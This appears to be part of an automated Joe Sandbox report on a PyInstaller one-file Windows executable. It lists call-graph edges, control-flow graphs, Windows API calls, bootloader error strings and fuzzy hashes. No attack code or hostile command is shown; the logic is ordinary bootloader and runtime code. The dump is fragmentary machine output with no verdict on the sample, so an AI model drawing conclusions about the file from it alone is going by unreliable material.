7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 18830->18833 18831->18812 18832->18826 18833->18831 18835 7ff7e5316a4f 18834->18835 18837 7ff7e5316a66 18834->18837 18840 7ff7e531ff68 18835->18840 18838 7ff7e5316a54 18837->18838 18845 7ff7e531ff98 18837->18845 18838->18820 18841 7ff7e531b150 __GetCurrentState 45 API calls 18840->18841 18842 7ff7e531ff71 18841->18842 18846 7ff7e5314f4c 45 API calls 18845->18846 18886->16933 18888 7ff7e531b150 __GetCurrentState 45 API calls 18887->18888 18889 7ff7e531a3e1 18888->18889 18890 7ff7e531a504 __GetCurrentState 45 API calls 18889->18890 18891 7ff7e531a401 18890->18891 20382 7ff7e5319d50 20385 7ff7e5319ccc 20382->20385 20392 7ff7e53202d8 EnterCriticalSection 20385->20392 20617 7ff7e531afd0 20618 7ff7e531afea 20617->20618 20619 7ff7e531afd5 20617->20619 20623 7ff7e531aff0 20619->20623 20624 7ff7e531b03a 20623->20624 20625 7ff7e531b032 20623->20625 20627 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20624->20627 20626 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20625->20626 20626->20624 20628 7ff7e531b047 20627->20628 20629 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20628->20629 20630 7ff7e531b054 20629->20630 20631 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20630->20631 20632 7ff7e531b061 20631->20632 20633 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20632->20633 20634 7ff7e531b06e 20633->20634 20635 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20634->20635 20636 7ff7e531b07b 20635->20636 20637 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20636->20637 20638 7ff7e531b088 20637->20638 20639 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20638->20639 20640 7ff7e531b095 20639->20640 20641 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20640->20641 20642 7ff7e531b0a5 20641->20642 20643 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20642->20643 20644 7ff7e531b0b5 20643->20644 20649 7ff7e531ae94 20644->20649 20663 7ff7e53202d8 EnterCriticalSection 20649->20663 20393 7ff7e530cb50 20394 7ff7e530cb60 20393->20394 20410 7ff7e5319ba8 20394->20410 20396 7ff7e530cb6c 20416 7ff7e530ce48 20396->20416 20398 7ff7e530d12c 7 API calls 20400 7ff7e530cc05 20398->20400 20399 7ff7e530cb84 _RTC_Initialize 20408 7ff7e530cbd9 20399->20408 20421 7ff7e530cff8 20399->20421 20402 7ff7e530cb99 20424 7ff7e5319014 20402->20424 20408->20398 20409 7ff7e530cbf5 20408->20409 20411 7ff7e5319bb9 20410->20411 20412 7ff7e5319bc1 20411->20412 20413 7ff7e5314f08 _set_fmode 11 API calls 20411->20413 20412->20396 20414 7ff7e5319bd0 20413->20414 20415 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 20414->20415 20415->20412 20417 7ff7e530ce59 20416->20417 20420 7ff7e530ce5e __scrt_release_startup_lock 20416->20420 20418 7ff7e530d12c 7 API calls 20417->20418 20417->20420 20419 7ff7e530ced2 20418->20419 20420->20399 20449 7ff7e530cfbc 20421->20449 20423 7ff7e530d001 20423->20402 20425 7ff7e5319034 20424->20425 20426 7ff7e530cba5 20424->20426 20427 7ff7e531903c 20425->20427 20428 7ff7e5319052 GetModuleFileNameW 20425->20428 20426->20408 20448 7ff7e530d0cc InitializeSListHead 20426->20448 20429 7ff7e5314f08 _set_fmode 11 API calls 20427->20429 20432 7ff7e531907d 20428->20432 20430 7ff7e5319041 20429->20430 20431 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 20430->20431 20431->20426 20433 7ff7e5318fb4 11 API calls 20432->20433 20434 7ff7e53190bd 20433->20434 20435 7ff7e53190c5 20434->20435 20440 7ff7e53190dd 20434->20440 20436 7ff7e5314f08 _set_fmode 11 API calls 20435->20436 20437 7ff7e53190ca 20436->20437 20438 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20437->20438 20438->20426 20439 7ff7e53190ff 20441 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20439->20441 20440->20439 20442 7ff7e531912b 20440->20442 20443 7ff7e5319144 20440->20443 20441->20426 20444 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20442->20444 20445 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20443->20445 20446 7ff7e5319134 20444->20446 20445->20439 20447 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20446->20447 20447->20426 20450 7ff7e530cfd6 20449->20450 20452 7ff7e530cfcf 20449->20452 20453 7ff7e531a1ec 20450->20453 20452->20423 20456 7ff7e5319e28 20453->20456 20463 7ff7e53202d8 EnterCriticalSection 20456->20463

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 0 7ff7e53089e0-7ff7e5308b26 call 7ff7e530c850 call 7ff7e5309390 SetConsoleCtrlHandler GetStartupInfoW call 7ff7e53153f0 call 7ff7e531a47c call 7ff7e531871c call 7ff7e53153f0 call 7ff7e531a47c call 7ff7e531871c call 7ff7e53153f0 call 7ff7e531a47c call 7ff7e531871c GetCommandLineW CreateProcessW 23 7ff7e5308b28-7ff7e5308b48 GetLastError call 7ff7e5302c50 0->23 24 7ff7e5308b4d-7ff7e5308b89 RegisterClassW 0->24 31 7ff7e5308e39-7ff7e5308e5f call 7ff7e530c550 23->31 26 7ff7e5308b8b GetLastError 24->26 27 7ff7e5308b91-7ff7e5308be5 CreateWindowExW 24->27 26->27 29 7ff7e5308be7-7ff7e5308bed GetLastError 27->29 30 7ff7e5308bef-7ff7e5308bf4 ShowWindow 27->30 32 7ff7e5308bfa-7ff7e5308c0a WaitForSingleObject 29->32 30->32 34 7ff7e5308c88-7ff7e5308c8f 32->34 35 7ff7e5308c0c 32->35 36 7ff7e5308c91-7ff7e5308ca1 WaitForSingleObject 34->36 37 7ff7e5308cd2-7ff7e5308cd9 34->37 39 7ff7e5308c10-7ff7e5308c13 35->39 40 7ff7e5308ca7-7ff7e5308cb7 TerminateProcess 36->40 41 7ff7e5308df8-7ff7e5308e02 36->41 42 7ff7e5308cdf-7ff7e5308cf5 QueryPerformanceFrequency QueryPerformanceCounter 37->42 43 7ff7e5308dc0-7ff7e5308dd9 GetMessageW 37->43 44 7ff7e5308c1b-7ff7e5308c22 39->44 45 7ff7e5308c15 GetLastError 39->45 51 7ff7e5308cb9 GetLastError 40->51 52 7ff7e5308cbf-7ff7e5308ccd WaitForSingleObject 40->52 49 7ff7e5308e11-7ff7e5308e35 GetExitCodeProcess CloseHandle * 2 41->49 50 7ff7e5308e04-7ff7e5308e0a DestroyWindow 41->50 53 7ff7e5308d00-7ff7e5308d38 MsgWaitForMultipleObjects PeekMessageW 42->53 47 7ff7e5308ddb-7ff7e5308de9 TranslateMessage DispatchMessageW 43->47 48 7ff7e5308def-7ff7e5308df6 43->48 44->36 46 7ff7e5308c24-7ff7e5308c41 PeekMessageW 44->46 45->44 54 7ff7e5308c43-7ff7e5308c74 TranslateMessage DispatchMessageW PeekMessageW 46->54 55 7ff7e5308c76-7ff7e5308c86 WaitForSingleObject 46->55 47->48 48->41 48->43 49->31 50->49 51->52 52->41 56 7ff7e5308d3a 53->56 57 7ff7e5308d73-7ff7e5308d7a 53->57 54->54 54->55 55->34 55->39 58 7ff7e5308d40-7ff7e5308d71 TranslateMessage DispatchMessageW PeekMessageW 56->58 57->43 59 7ff7e5308d7c-7ff7e5308da5 QueryPerformanceCounter 57->59 58->57 58->58 59->53 60 7ff7e5308dab-7ff7e5308db2 59->60 60->41 61 7ff7e5308db4-7ff7e5308db8 60->61 61->43
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                                • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                                • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                                • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                                • Instruction ID: 34a23b646b9e6aaef7df48c1f441667d711cbb39b7bce725a3b35a5b7375ec89
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99D18135A18F8A86E710AF74E8743A9B764FB64F5CF80023ADA5D82A94DF3CE1458711

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 62 7ff7e5301000-7ff7e5303806 call 7ff7e530fe18 call 7ff7e530fe20 call 7ff7e530c850 call 7ff7e53153f0 call 7ff7e5315484 call 7ff7e53036b0 76 7ff7e5303814-7ff7e5303836 call 7ff7e5301950 62->76 77 7ff7e5303808-7ff7e530380f 62->77 83 7ff7e530383c-7ff7e5303856 call 7ff7e5301c80 76->83 84 7ff7e530391b-7ff7e5303931 call 7ff7e53045c0 76->84 78 7ff7e5303c97-7ff7e5303cb2 call 7ff7e530c550 77->78 88 7ff7e530385b-7ff7e530389b call 7ff7e5308830 83->88 90 7ff7e5303933-7ff7e5303960 call 7ff7e5307f90 84->90 91 7ff7e530396a-7ff7e530397f call 7ff7e5302710 84->91 95 7ff7e53038c1-7ff7e53038cc call 7ff7e5314f30 88->95 96 7ff7e530389d-7ff7e53038a3 88->96 102 7ff7e5303984-7ff7e53039a6 call 7ff7e5301c80 90->102 103 7ff7e5303962-7ff7e5303965 call 7ff7e531004c 90->103 104 7ff7e5303c8f 91->104 111 7ff7e53038d2-7ff7e53038e1 call 7ff7e5308830 95->111 112 7ff7e53039fc-7ff7e5303a2a call 7ff7e5308940 call 7ff7e53089a0 * 3 95->112 99 7ff7e53038a5-7ff7e53038ad 96->99 100 7ff7e53038af-7ff7e53038bd call 7ff7e53089a0 96->100 99->100 100->95 113 7ff7e53039b0-7ff7e53039b9 102->113 103->91 104->78 120 7ff7e53039f4-7ff7e53039f7 call 7ff7e5314f30 111->120 121 7ff7e53038e7-7ff7e53038ed 111->121 137 7ff7e5303a2f-7ff7e5303a3e call 7ff7e5308830 112->137 113->113 116 7ff7e53039bb-7ff7e53039d8 call 7ff7e5301950 113->116 116->88 128 7ff7e53039de-7ff7e53039ef call 7ff7e5302710 116->128 120->112 125 7ff7e53038f0-7ff7e53038fc 121->125 129 7ff7e5303905-7ff7e5303908 125->129 130 7ff7e53038fe-7ff7e5303903 125->130 128->104 129->120 132 7ff7e530390e-7ff7e5303916 call 7ff7e5314f30 129->132 130->125 130->129 132->137 141 7ff7e5303b45-7ff7e5303b53 137->141 142 7ff7e5303a44-7ff7e5303a47 137->142 143 7ff7e5303b59-7ff7e5303b5d 141->143 144 7ff7e5303a67 141->144 142->141 145 7ff7e5303a4d-7ff7e5303a50 142->145 146 7ff7e5303a6b-7ff7e5303a90 call 7ff7e5314f30 143->146 144->146 147 7ff7e5303a56-7ff7e5303a5a 145->147 148 7ff7e5303b14-7ff7e5303b17 145->148 157 7ff7e5303a92-7ff7e5303aa6 call 7ff7e5308940 146->157 158 7ff7e5303aab-7ff7e5303ac0 146->158 147->148 149 7ff7e5303a60 147->149 150 7ff7e5303b2f-7ff7e5303b40 call 7ff7e5302710 148->150 151 7ff7e5303b19-7ff7e5303b1d 148->151 149->144 161 7ff7e5303c7f-7ff7e5303c87 150->161 151->150 153 7ff7e5303b1f-7ff7e5303b2a 151->153 153->146 157->158 159 7ff7e5303ac6-7ff7e5303aca 158->159 160 7ff7e5303be8-7ff7e5303bfa call 7ff7e5308830 158->160 164 7ff7e5303ad0-7ff7e5303ae8 call 7ff7e5315250 159->164 165 7ff7e5303bcd-7ff7e5303be2 call 7ff7e5301940 159->165 169 7ff7e5303c2e 160->169 170 7ff7e5303bfc-7ff7e5303c02 160->170 161->104 175 7ff7e5303b62-7ff7e5303b7a call 7ff7e5315250 164->175 176 7ff7e5303aea-7ff7e5303b02 call 7ff7e5315250 164->176 165->159 165->160 177 7ff7e5303c31-7ff7e5303c40 call 7ff7e5314f30 169->177 173 7ff7e5303c04-7ff7e5303c1c 170->173 174 7ff7e5303c1e-7ff7e5303c2c 170->174 173->177 174->177 184 7ff7e5303b7c-7ff7e5303b80 175->184 185 7ff7e5303b87-7ff7e5303b9f call 7ff7e5315250 175->185 176->165 186 7ff7e5303b08-7ff7e5303b0f 176->186 187 7ff7e5303c46-7ff7e5303c4a 177->187 188 7ff7e5303d41-7ff7e5303d63 call 7ff7e53044e0 177->188 184->185 197 7ff7e5303ba1-7ff7e5303ba5 185->197 198 7ff7e5303bac-7ff7e5303bc4 call 7ff7e5315250 185->198 186->165 190 7ff7e5303cd4-7ff7e5303ce6 call 7ff7e5308830 187->190 191 7ff7e5303c50-7ff7e5303c5f call 7ff7e53090e0 187->191 201 7ff7e5303d65-7ff7e5303d6f call 7ff7e5304630 188->201 202 7ff7e5303d71-7ff7e5303d82 call 7ff7e5301c80 188->202 208 7ff7e5303d35-7ff7e5303d3c 190->208 209 7ff7e5303ce8-7ff7e5303ceb 190->209 206 7ff7e5303cb3-7ff7e5303cb6 call 7ff7e5308660 191->206 207 7ff7e5303c61 191->207 197->198 198->165 221 7ff7e5303bc6 198->221 212 7ff7e5303d87-7ff7e5303d96 201->212 202->212 220 7ff7e5303cbb-7ff7e5303cbd 206->220 215 7ff7e5303c68 call 7ff7e5302710 207->215 208->215 209->208 210 7ff7e5303ced-7ff7e5303d10 call 7ff7e5301c80 209->210 228 7ff7e5303d12-7ff7e5303d26 call 7ff7e5302710 call 7ff7e5314f30 210->228 229 7ff7e5303d2b-7ff7e5303d33 call 7ff7e5314f30 210->229 218 7ff7e5303dc4-7ff7e5303dda call 7ff7e5309390 212->218 219 7ff7e5303d98-7ff7e5303d9f 212->219 222 7ff7e5303c6d-7ff7e5303c77 215->222 234 7ff7e5303ddc 218->234 235 7ff7e5303de8-7ff7e5303e04 SetDllDirectoryW 218->235 219->218 224 7ff7e5303da1-7ff7e5303da5 219->224 226 7ff7e5303cbf-7ff7e5303cc6 220->226 227 7ff7e5303cc8-7ff7e5303ccf 220->227 221->165 222->161 224->218 230 7ff7e5303da7-7ff7e5303dbe SetDllDirectoryW LoadLibraryExW 224->230 226->215 227->212 228->222 229->212 230->218 234->235 238 7ff7e5303f01-7ff7e5303f08 235->238 239 7ff7e5303e0a-7ff7e5303e19 call 7ff7e5308830 235->239 241 7ff7e5303f0e-7ff7e5303f15 238->241 242 7ff7e5304008-7ff7e5304010 238->242 249 7ff7e5303e32-7ff7e5303e3c call 7ff7e5314f30 239->249 250 7ff7e5303e1b-7ff7e5303e21 239->250 241->242 246 7ff7e5303f1b-7ff7e5303f25 call 7ff7e53033c0 241->246 247 7ff7e5304035-7ff7e5304067 call 7ff7e53036a0 call 7ff7e5303360 call 7ff7e5303670 call 7ff7e5306fc0 call 7ff7e5306d70 242->247 248 7ff7e5304012-7ff7e530402f PostMessageW GetMessageW 242->248 246->222 260 7ff7e5303f2b-7ff7e5303f3f call 7ff7e53090c0 246->260 248->247 262 7ff7e5303ef2-7ff7e5303efc call 7ff7e5308940 249->262 263 7ff7e5303e42-7ff7e5303e48 249->263 254 7ff7e5303e23-7ff7e5303e2b 250->254 255 7ff7e5303e2d-7ff7e5303e2f 250->255 254->255 255->249 269 7ff7e5303f64-7ff7e5303f7a call 7ff7e5308940 call 7ff7e53089e0 260->269 270 7ff7e5303f41-7ff7e5303f5e PostMessageW GetMessageW 260->270 262->238 263->262 267 7ff7e5303e4e-7ff7e5303e54 263->267 272 7ff7e5303e56-7ff7e5303e58 267->272 273 7ff7e5303e5f-7ff7e5303e61 267->273 284 7ff7e5303f7f-7ff7e5303fa7 call 7ff7e5306fc0 call 7ff7e5306d70 call 7ff7e53088e0 269->284 270->269 276 7ff7e5303e5a 272->276 277 7ff7e5303e67-7ff7e5303e83 call 7ff7e5306dc0 call 7ff7e5307340 272->277 273->238 273->277 276->238 289 7ff7e5303e85-7ff7e5303e8c 277->289 290 7ff7e5303e8e-7ff7e5303e95 277->290 311 7ff7e5303ff5-7ff7e5304003 call 7ff7e5301900 284->311 312 7ff7e5303fa9-7ff7e5303fbf call 7ff7e5308ed0 call 7ff7e53088e0 284->312 292 7ff7e5303edb-7ff7e5303ef0 call 7ff7e5302a50 call 7ff7e5306fc0 call 7ff7e5306d70 289->292 293 7ff7e5303eaf-7ff7e5303eb9 call 7ff7e53071b0 290->293 294 7ff7e5303e97-7ff7e5303ea4 call 7ff7e5306e00 290->294 292->238 306 7ff7e5303ec4-7ff7e5303ed2 call 7ff7e53074f0 293->306 307 7ff7e5303ebb-7ff7e5303ec2 293->307 294->293 305 7ff7e5303ea6-7ff7e5303ead 294->305 305->292 306->238 319 7ff7e5303ed4 306->319 307->292 311->222 312->311 323 7ff7e5303fc1-7ff7e5303fd6 312->323 319->292 324 7ff7e5303ff0 call 7ff7e5302a50 323->324 325 7ff7e5303fd8-7ff7e5303feb call 7ff7e5302710 call 7ff7e5301900 323->325 324->311 325->222
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                                                                • API String ID: 2776309574-4232158417
                                                                                                                                                                                                                                                • Opcode ID: 9db08009f9163a53b25ab8bbdba1475377257322832201579c571555304dfb08
                                                                                                                                                                                                                                                • Instruction ID: 48b469b6058e914182f22fc12b5445964d109d40d9f7bebfd2ac694a22a3811e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9db08009f9163a53b25ab8bbdba1475377257322832201579c571555304dfb08
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B327D21A28B8A51EA15F72595743B9E251AF64F8CFC4403BDA4DC32D6EF3CE558C322

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 479 7ff7e5325c00-7ff7e5325c3b call 7ff7e5325588 call 7ff7e5325590 call 7ff7e53255f8 486 7ff7e5325c41-7ff7e5325c4c call 7ff7e5325598 479->486 487 7ff7e5325e65-7ff7e5325eb1 call 7ff7e531a900 call 7ff7e5325588 call 7ff7e5325590 call 7ff7e53255f8 479->487 486->487 492 7ff7e5325c52-7ff7e5325c5c 486->492 512 7ff7e5325eb7-7ff7e5325ec2 call 7ff7e5325598 487->512 513 7ff7e5325fef-7ff7e532605d call 7ff7e531a900 call 7ff7e5321578 487->513 495 7ff7e5325c7e-7ff7e5325c82 492->495 496 7ff7e5325c5e-7ff7e5325c61 492->496 499 7ff7e5325c85-7ff7e5325c8d 495->499 498 7ff7e5325c64-7ff7e5325c6f 496->498 501 7ff7e5325c7a-7ff7e5325c7c 498->501 502 7ff7e5325c71-7ff7e5325c78 498->502 499->499 503 7ff7e5325c8f-7ff7e5325ca2 call 7ff7e531d5fc 499->503 501->495 505 7ff7e5325cab-7ff7e5325cb9 501->505 502->498 502->501 510 7ff7e5325cba-7ff7e5325cc6 call 7ff7e531a948 503->510 511 7ff7e5325ca4-7ff7e5325ca6 call 7ff7e531a948 503->511 521 7ff7e5325ccd-7ff7e5325cd5 510->521 511->505 512->513 522 7ff7e5325ec8-7ff7e5325ed3 call 7ff7e53255c8 512->522 531 7ff7e532606b-7ff7e532606e 513->531 532 7ff7e532605f-7ff7e5326066 513->532 521->521 524 7ff7e5325cd7-7ff7e5325ce8 call 7ff7e5320474 521->524 522->513 534 7ff7e5325ed9-7ff7e5325efc call 7ff7e531a948 GetTimeZoneInformation 522->534 524->487 533 7ff7e5325cee-7ff7e5325d44 call 7ff7e532a4d0 * 4 call 7ff7e5325b1c 524->533 538 7ff7e5326070 531->538 539 7ff7e53260a5-7ff7e53260b8 call 7ff7e531d5fc 531->539 536 7ff7e53260fb-7ff7e53260fe 532->536 592 7ff7e5325d46-7ff7e5325d4a 533->592 545 7ff7e5325f02-7ff7e5325f23 534->545 546 7ff7e5325fc4-7ff7e5325fee call 7ff7e5325580 call 7ff7e5325570 call 7ff7e5325578 534->546 543 7ff7e5326104-7ff7e532610c call 7ff7e5325c00 536->543 544 7ff7e5326073 536->544 538->544 555 7ff7e53260ba 539->555 556 7ff7e53260c3-7ff7e53260de call 7ff7e5321578 539->556 550 7ff7e5326078-7ff7e53260a4 call 7ff7e531a948 call 7ff7e530c550 543->550 544->550 551 7ff7e5326073 call 7ff7e5325e7c 544->551 552 7ff7e5325f2e-7ff7e5325f35 545->552 553 7ff7e5325f25-7ff7e5325f2b 545->553 551->550 560 7ff7e5325f37-7ff7e5325f3f 552->560 561 7ff7e5325f49 552->561 553->552 563 7ff7e53260bc-7ff7e53260c1 call 7ff7e531a948 555->563 579 7ff7e53260e0-7ff7e53260e3 556->579 580 7ff7e53260e5-7ff7e53260f7 call 7ff7e531a948 556->580 560->561 567 7ff7e5325f41-7ff7e5325f47 560->567 572 7ff7e5325f4b-7ff7e5325fbf call 7ff7e532a4d0 * 4 call 7ff7e5322b5c call 7ff7e5326114 * 2 561->572 563->538 567->572 572->546 579->563 580->536 594 7ff7e5325d4c 592->594 595 7ff7e5325d50-7ff7e5325d54 592->595 594->595 595->592 596 7ff7e5325d56-7ff7e5325d7b call 7ff7e5316b58 595->596 603 7ff7e5325d7e-7ff7e5325d82 596->603 605 7ff7e5325d91-7ff7e5325d95 603->605 606 7ff7e5325d84-7ff7e5325d8f 603->606 605->603 606->605 608 7ff7e5325d97-7ff7e5325d9b 606->608 610 7ff7e5325e1c-7ff7e5325e20 608->610 611 7ff7e5325d9d-7ff7e5325dc5 call 7ff7e5316b58 608->611 612 7ff7e5325e27-7ff7e5325e34 610->612 613 7ff7e5325e22-7ff7e5325e24 610->613 619 7ff7e5325dc7 611->619 620 7ff7e5325de3-7ff7e5325de7 611->620 615 7ff7e5325e4f-7ff7e5325e5e call 7ff7e5325580 call 7ff7e5325570 612->615 616 7ff7e5325e36-7ff7e5325e4c call 7ff7e5325b1c 612->616 613->612 615->487 616->615 623 7ff7e5325dca-7ff7e5325dd1 619->623 620->610 625 7ff7e5325de9-7ff7e5325e07 call 7ff7e5316b58 620->625 623->620 626 7ff7e5325dd3-7ff7e5325de1 623->626 631 7ff7e5325e13-7ff7e5325e1a 625->631 626->620 626->623 631->610 632 7ff7e5325e09-7ff7e5325e0d 631->632 632->610 633 7ff7e5325e0f 632->633 633->631
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7E5325C45
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E5325598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E53255AC
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E531A948: RtlFreeHeap.NTDLL(?,?,?,00007FF7E5322D22,?,?,?,00007FF7E5322D5F,?,?,00000000,00007FF7E5323225,?,?,?,00007FF7E5323157), ref: 00007FF7E531A95E
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E531A948: GetLastError.KERNEL32(?,?,?,00007FF7E5322D22,?,?,?,00007FF7E5322D5F,?,?,00000000,00007FF7E5323225,?,?,?,00007FF7E5323157), ref: 00007FF7E531A968
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E531A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7E531A8DF,?,?,?,?,?,00007FF7E531A7CA), ref: 00007FF7E531A909
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E531A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7E531A8DF,?,?,?,?,?,00007FF7E531A7CA), ref: 00007FF7E531A92E
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7E5325C34
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E53255F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E532560C
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7E5325EAA
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7E5325EBB
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7E5325ECC
                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7E532610C), ref: 00007FF7E5325EF3
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
